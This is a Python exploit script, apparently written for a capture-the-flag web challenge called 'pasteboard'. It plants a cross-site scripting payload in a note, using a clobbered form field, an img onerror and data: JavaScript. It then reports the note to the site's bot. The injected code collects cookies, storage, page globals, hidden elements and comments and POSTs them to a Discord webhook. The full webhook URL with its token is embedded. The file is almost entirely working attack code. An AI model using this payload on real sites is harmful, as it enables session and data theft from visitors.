#!/usr/bin/env python3
"""
Comprehensive Flag Search - Check EVERY possible location
"""
import requests
import time
from urllib.parse import urljoin

CHALLENGE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1459424345695715369/Gnx874Rcb7-ZXqQ6VDy-M_nSB-Su9R8KHIkcyj890gv1e60djv89CJbCkyRi-QPc-HvH"

# Check EVERYTHING that might contain "uoftctf"
js_code = """
let results={};
let webhook='""" + DISCORD_WEBHOOK + """';

// 1. Check window properties
results.window_flag=window.FLAG||window.flag||null;

// 2. Check all global variables
let globals=Object.getOwnPropertyNames(window);
results.globals_with_flag=globals.filter(k=>k.toLowerCase().includes('flag'));

// 3. Check all script tags content
let scripts=Array.from(document.scripts).map(s=>s.textContent);
results.scripts_have_flag=scripts.some(s=>s.includes('uoftctf'));

// 4. Check data attributes
results.body_data=document.body.dataset;
results.html_data=document.documentElement.dataset;

// 5. Check meta tags
let metas=Array.from(document.querySelectorAll('meta')).map(m=>({
name:m.name,
content:m.content,
property:m.property
}));
results.metas=metas;

// 6. Check hidden elements
let hidden=Array.from(document.querySelectorAll('[hidden],[style*="display:none"],[style*="display: none"]'));
results.hidden_count=hidden.length;
results.hidden_text=hidden.map(h=>h.textContent).join(' ');

// 7. Check comments
let walker=document.createTreeWalker(document,NodeFilter.SHOW_COMMENT);
let comments=[];
let node;
while(node=walker.nextNode()){
if(node.nodeValue.includes('uoftctf')||node.nodeValue.includes('flag')){
comments.push(node.nodeValue);
}
}
results.comments=comments;

// 8. Check cookies after delay
setTimeout(()=>{
results.delayed_cookie=document.cookie;
results.delayed_storage_length=localStorage.length+sessionStorage.length;

fetch(webhook,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({content:'RESULTS: '+JSON.stringify(results,null,2).substring(0,1900)})
});
},3000);

// Also send immediate check
fetch(webhook,{
method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({content:'Checking all locations...'})
});
""".replace('\n', ' ')

payload = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{js_code}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

print("="*80)
print("COMPREHENSIVE FLAG SEARCH")
print("="*80)
print("Checking ALL possible flag locations")
print("="*80)

response = requests.post(
    urljoin(CHALLENGE_URL, "/note/new"),
    data={"title": "Full Search", "body": payload},
    allow_redirects=False
)

if response.status_code == 302:
    note_path = response.headers.get('Location')
    print(f"[+] Paste: {urljoin(CHALLENGE_URL, note_path)}")

    time.sleep(1)

    report_response = requests.post(
        urljoin(CHALLENGE_URL, "/report"),
        data={"url": note_path}
    )

    if report_response.status_code == 202:
        print(f"[+] Queued!")
        print(f"\nSearching:")
        print(f"  - window.FLAG/flag properties")
        print(f"  - All global variables with 'flag'")
        print(f"  - Script tag contents")
        print(f"  - Data attributes")
        print(f"  - Meta tags")
        print(f"  - Hidden elements")
        print(f"  - HTML comments")
        print(f"  - Delayed cookies/storage")
        print(f"\nCheck Discord in ~15 seconds!")
    else:
        print(f"[-] Failed: {report_response.status_code}")
else:
    print(f"[-] Failed: {response.status_code}")